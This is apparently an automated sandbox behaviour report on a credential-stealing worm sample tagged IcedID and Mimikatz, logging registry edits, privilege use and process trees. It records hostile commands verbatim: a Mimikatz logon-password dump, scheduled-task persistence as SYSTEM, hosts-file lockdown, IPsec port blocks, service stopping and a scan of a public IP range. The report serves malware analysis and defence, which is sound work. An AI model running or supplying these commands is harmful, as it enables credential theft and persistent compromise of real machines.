\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yittybr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2436 cmd.exe 2428 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023c19-5.dat nsis_installer_2 behavioral2/files/0x0016000000023c4d-15.dat nsis_installer_1 behavioral2/files/0x0016000000023c4d-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ yittybr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" yittybr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" yittybr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing yittybr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" yittybr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" yittybr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ yittybr.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2428 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4104 schtasks.exe 4228 schtasks.exe 4360 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4240 2025-01-12_f45a50888b5fca0bd08d8fa64be0cdc3_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4240 2025-01-12_f45a50888b5fca0bd08d8fa64be0cdc3_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3324 yittybr.exe Token: SeDebugPrivilege 2100 yittybr.exe Token: SeDebugPrivilege 2420 vfshost.exe Token: SeDebugPrivilege 5004 btjlhtrlh.exe Token: SeLockMemoryPrivilege 448 ttlnnh.exe Token: SeLockMemoryPrivilege 448 ttlnnh.exe Token: SeDebugPrivilege 3368 btjlhtrlh.exe Token: SeDebugPrivilege 2584 btjlhtrlh.exe Token: SeDebugPrivilege 5108 btjlhtrlh.exe Token: SeDebugPrivilege 1308 btjlhtrlh.exe Token: SeDebugPrivilege 4424 btjlhtrlh.exe Token: SeDebugPrivilege 4240 btjlhtrlh.exe Token: SeDebugPrivilege 2660 btjlhtrlh.exe Token: SeDebugPrivilege 4284 btjlhtrlh.exe Token: SeDebugPrivilege 672 btjlhtrlh.exe Token: SeDebugPrivilege 652 btjlhtrlh.exe Token: SeDebugPrivilege 1476 btjlhtrlh.exe Token: SeDebugPrivilege 4744 btjlhtrlh.exe Token: SeDebugPrivilege 2356 btjlhtrlh.exe Token: SeDebugPrivilege 4412 btjlhtrlh.exe Token: SeDebugPrivilege 3280 btjlhtrlh.exe Token: SeDebugPrivilege 4340 btjlhtrlh.exe Token: SeDebugPrivilege 2036 btjlhtrlh.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4240 2025-01-12_f45a50888b5fca0bd08d8fa64be0cdc3_hacktools_icedid_mimikatz.exe 4240 2025-01-12_f45a50888b5fca0bd08d8fa64be0cdc3_hacktools_icedid_mimikatz.exe 3324 yittybr.exe 3324 yittybr.exe 2100 yittybr.exe 2100 yittybr.exe 1784 xohudmc.exe 3308 nslfoo.exe 1724 yittybr.exe 1724 yittybr.exe 1324 yittybr.exe 1324 yittybr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4240 wrote to memory of 2436 4240 2025-01-12_f45a50888b5fca0bd08d8fa64be0cdc3_hacktools_icedid_mimikatz.exe 82 PID 4240 wrote to memory of 2436 4240 2025-01-12_f45a50888b5fca0bd08d8fa64be0cdc3_hacktools_icedid_mimikatz.exe 82 PID 4240 wrote to memory of 2436 4240 2025-01-12_f45a50888b5fca0bd08d8fa64be0cdc3_hacktools_icedid_mimikatz.exe 82 PID 2436 wrote to memory of 2428 2436 cmd.exe 84 PID 2436 wrote to memory of 2428 2436 cmd.exe 84 PID 2436 wrote to memory of 2428 2436 cmd.exe 84 PID 2436 wrote to memory of 3324 2436 cmd.exe 85 PID 2436 wrote to memory of 3324 2436 cmd.exe 85 PID 2436 wrote to memory of 3324 2436 cmd.exe 85 PID 2100 wrote to memory of 2936 2100 yittybr.exe 87 PID 2100 wrote to memory of 2936 2100 yittybr.exe 87 PID 2100 wrote to memory of 2936 2100 yittybr.exe 87 PID 2936 wrote to memory of 2128 2936 cmd.exe 89 PID 2936 wrote to memory of 2128 2936 cmd.exe 89 PID 2936 wrote to memory of 2128 2936 cmd.exe 89 PID 2936 wrote to memory of 4396 2936 cmd.exe 90 PID 2936 wrote to memory of 4396 2936 cmd.exe 90 PID 2936 wrote to memory of 4396 2936 cmd.exe 90 PID 2936 wrote to memory of 1852 2936 cmd.exe 91 PID 2936 wrote to memory of 1852 2936 cmd.exe 91 PID 2936 wrote to memory of 1852 2936 cmd.exe 91 PID 2936 wrote to memory of 1824 2936 cmd.exe 92 PID 2936 wrote to memory of 1824 2936 cmd.exe 92 PID 2936 wrote to memory of 1824 2936 cmd.exe 92 PID 2936 wrote to memory of 452 2936 cmd.exe 93 PID 2936 wrote to memory of 452 2936 cmd.exe 93 PID 2936 wrote to memory of 452 2936 cmd.exe 93 PID 2936 wrote to memory of 1468 2936 cmd.exe 94 PID 2936 wrote to memory of 1468 2936 cmd.exe 94 PID 2936 wrote to memory of 1468 2936 cmd.exe 94 PID 2100 wrote to memory of 4300 2100 yittybr.exe 95 PID 2100 wrote to memory of 4300 2100 yittybr.exe 95 PID 2100 wrote to memory of 4300 2100 yittybr.exe 95 PID 2100 wrote to memory of 3012 2100 yittybr.exe 97 PID 2100 wrote to memory of 3012 2100 yittybr.exe 97 PID 2100 wrote to memory of 3012 2100 yittybr.exe 97 PID 2100 wrote to memory of 4104 2100 yittybr.exe 99 PID 2100 wrote to memory of 4104 2100 yittybr.exe 99 PID 2100 wrote to memory of 4104 2100 yittybr.exe 99 PID 2100 wrote to memory of 5028 2100 yittybr.exe 106 PID 2100 wrote to memory of 5028 2100 yittybr.exe 106 PID 2100 wrote to memory of 5028 2100 yittybr.exe 106 PID 5028 wrote to memory of 1772 5028 cmd.exe 108 PID 5028 wrote to memory of 1772 5028 cmd.exe 108 PID 5028 wrote to memory of 1772 5028 cmd.exe 108 PID 1772 wrote to memory of 3040 1772 wpcap.exe 109 PID 1772 wrote to memory of 3040 1772 wpcap.exe 109 PID 1772 wrote to memory of 3040 1772 wpcap.exe 109 PID 3040 wrote to memory of 3684 3040 net.exe 111 PID 3040 wrote to memory of 3684 3040 net.exe 111 PID 3040 wrote to memory of 3684 3040 net.exe 111 PID 1772 wrote to memory of 3016 1772 wpcap.exe 112 PID 1772 wrote to memory of 3016 1772 wpcap.exe 112 PID 1772 wrote to memory of 3016 1772 wpcap.exe 112 PID 3016 wrote to memory of 3368 3016 net.exe 114 PID 3016 wrote to memory of 3368 3016 net.exe 114 PID 3016 wrote to memory of 3368 3016 net.exe 114 PID 1772 wrote to memory of 2004 1772 wpcap.exe 115 PID 1772 wrote to memory of 2004 1772 wpcap.exe 115 PID 1772 wrote to memory of 2004 1772 wpcap.exe 115 PID 2004 wrote to memory of 4756 2004 net.exe 117 PID 2004 wrote to memory of 4756 2004 net.exe 117 PID 2004 wrote to memory of 4756 2004 net.exe 117 PID 1772 wrote to memory of 2360 1772 wpcap.exe 118
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2156
-
C:\Windows\TEMP\lntjubmbe\ttlnnh.exe"C:\Windows\TEMP\lntjubmbe\ttlnnh.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-12_f45a50888b5fca0bd08d8fa64be0cdc3_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-12_f45a50888b5fca0bd08d8fa64be0cdc3_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tllefmnq\yittybr.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2428
-
-
C:\Windows\tllefmnq\yittybr.exeC:\Windows\tllefmnq\yittybr.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3324
-
-
-
C:\Windows\tllefmnq\yittybr.exeC:\Windows\tllefmnq\yittybr.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2128
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1852
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:452
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:1468
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4300
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3012
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4104
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exeC:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3684
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:3368
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4756
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2360
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:1372
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2036
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2944 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4648
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4240
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4604
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4212
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:5000 -
C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exeC:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ppgkyibiq\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:3580 -
C:\Windows\ppgkyibiq\Corporate\vfshost.exeC:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1820 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1852 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2172
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2636 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4360
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4400
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4900
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4844
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4196
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1532
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
